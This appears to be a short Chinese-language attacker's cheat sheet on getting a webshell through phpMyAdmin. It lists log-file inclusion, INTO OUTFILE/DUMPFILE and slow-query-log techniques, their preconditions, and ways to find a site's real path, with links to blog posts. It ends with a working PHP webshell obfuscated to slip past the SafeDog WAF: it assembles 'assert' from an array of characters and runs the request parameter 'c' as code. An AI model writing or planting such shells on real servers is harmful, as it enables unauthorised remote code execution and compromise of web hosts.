phpmyadmin getshell的三种方式

方式一：包含日志文件getshell
方式二：into dumpfile 或者 into outfile 新表getshell
https://www.cnblogs.com/muxueblog/p/13043768.html
方式三：数据库慢查询日志【主要针对日志量庞大，通过日志文件GETSHELL出现问题的情况】[如果登录了phpMyadmin没有办法直接写入文件，可以使用慢查询日志来进行文件写入。简单的说就是在mysql中，查询超过10秒的语句会被写到慢查询日志文件中去，一般默认是不开启的]
条件：
目标站点存在phpMyAdmin和l.php探针
知道mysql登录密码
secure_file_priv未开启
https://blog.csdn.net/HAI_WD/article/details/105046195
https://blog.csdn.net/weixin_45447309/article/details/106930447

获取网站真实路径方法

phpinfo函数
报错页面
搜索引擎 关键字fatal error warning
https://www.cnblogs.com/lijianming180/p/12099553.html
https://xz.aliyun.com/t/2222

shell

免杀（绕过安全狗）

$arr = array(‘a’,’s’,’s’,’s’,’e’,’r’,’t’);
$func = “”;
for($i=0;$i<count($arr);$i++){
$func = $func.$arr[$i];
}
$func = substr($func,-6);
$func($_REQUEST[‘c’]);